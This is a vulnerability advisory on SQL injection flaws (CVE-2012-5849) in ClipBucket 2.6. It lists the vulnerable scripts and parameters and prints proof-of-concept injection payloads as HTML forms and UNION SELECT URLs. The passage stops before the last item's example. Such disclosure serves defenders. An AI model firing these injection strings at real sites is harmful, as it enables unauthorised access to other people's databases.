ClipBucket is prone to multiple SQL-injection vulnerabilities because the application fails to properly sanitize user-supplied input before using it in an SQL query.
Vulnerable Systems:
* ClipBucket 2.6 Revision 738 and probably prior
High-Tech Bridge Security Research Lab discovered multiple vulnerabilities in ClipBucket, which can be exploited to
perform SQL Injection attacks.
1) Multiple SQL Injections in ClipBucket: CVE-2012-5849
1.1 The vulnerability exists due to improper sanitation of input in multiple parameters within the "/ajax.php" script.
A remote attacker can send a specially crafted HTTP POST request and execute arbitrary SQL queries in application s
database. The following parameter are vulnerable to SQL injection attacks:
- "uid" (when "mode" is set to "add_friend"). This vulnerability require that attacker is logged-in into the
application, however new user registration is open by default ;
- "id" (when "mode" is set to "share_object" or "add_to_fav", and "type" is set to "video", "photo", or "collection");
- "id" (when "mode" is set to "rating" and "type" is set to "video", "photo", "collection", or "user"). This
vulnerabilities require that attacker is logged-in into the application, however new user registration is open by
default;
- "id" (when "mode" is set to "flag_object" and "type" is set to "video", "group", "user", "photo", or "collection");
- "cid" (when "mode" is set to "add_new_item" or "remove_collection_item" and "type" is set to "video" or "photo");
- "cid" (when "mode" is set to "remove_collection_item" and "type" is set to "videos" or "photos");
- "cid" (when "mode" is set to "get_item" or "load_more_items" and "type" is set to "videos" or "photos");
- "ci_id" (when "mode" is set to "get_item" and "type" is set to "videos" or "photos").
The following PoC (Proof-of-Concept) codes demonstrate the vulnerabilities.
The second type of PoC code uses error-based SQL injection technique to display SQL server version:
<form action="http://[host]/ajax.php"; method="post">
<input type="hidden" name="mode" value="rating" />
<input type="hidden" name="type" value="[video|photo|collection|user]" />
<input type="hidden" name="rating" value="1" />
<input type="hidden" name="id" value="-1 OR 1=(select min(@a:=1)from (select 1 union select 2)k group by (select
concat(@@version,0x0,@a:=(@a+1)%2))) -- " />
<input type="submit" id="btn">
</form>
The third PoC code demonstrates vulnerability exploitation by blind SQL injection technique:
<form action="http://[host]/ajax.php"; method="post">
<input type="hidden" name="mode" value="share_object" />
<input type="hidden" name="type" value="video" />
<input type="hidden" name="id" value="0 OR version()>='5' -- " />
<input type="submit" id="btn">
</form>
If application uses MySQL server version 5 or greater, the result of the above-mentioned HTTP request will be a message
saying: "You are not logged in" or "Please enter usernames or emails to send this video".
1.2 The vulnerability was discovered in the "/user_contacts.php" script while handling the "user" HTTP GET parameter. A
remote attacker can inject and execute arbitrary SQL commands in application s database.
The following PoC demonstrates the vulnerability:
http://[host]/user_contacts.php?user=0%27%20UNION%20SELECT%201,2,3,version%28%29,5,6,7,8,9,10,1,2,3,4,5,6,7,8,9,10,1,2,3,4,5,6,7,8,9,10,1,2,3,4,5,6,7,8,9,10,1,2,3,4,5,6,7,8,9,10%20--%202
1.3 The vulnerability was discovered in the "/view_channel.php" script while handling the "user" HTTP GET parameter. A
remote attacker can inject and execute arbitrary SQL commands in application s database.
The following PoC demonstrates the vulnerability:
http://[host]/view_channel.php?user=0%27%20UNION%20SELECT%201,2,3,version%28%29,5,6,7,8,9,10,1,2,3,4,5,6,7,8,9,10,1,2,3,4,5,6,7,8,9,10,1,2,3,4,5,6,7,8,9,10,1,2,3,4,5,6,7,8,9,10%20--%202
1.4 The vulnerability exists due to an error in the "view_page.php" script while handling the "pid" HTTP GET parameter.
A remote attacker can inject and execute arbitrary SQL commands in application s database.
The following PoC demonstrates the vulnerability:
http://[host]/view_page.php?pid=0%27%20UNION%20SELECT%201,2,3,4,5,version%28%29,7,8,9,10%20--%202
1.5 The vulnerability was discovered in the "view_topic.php" script while handling the "tid" HTTP GET parameter. A
remote attacker can inject and execute arbitrary SQL commands in application s database.
The following PoC demonstrates the vulnerability:
http://[host]/view_topic.php?tid=0%27%20UNION%20SELECT%201,version%28%29,3,4,5,6,7,8,9,10,11,12%20--%202
1.6 The vulnerability was discovered in the "/watch_video.php" script while handling the "v" HTTP GET parameter. A
remote attacker can inject and execute arbitrary SQL commands in application s database.
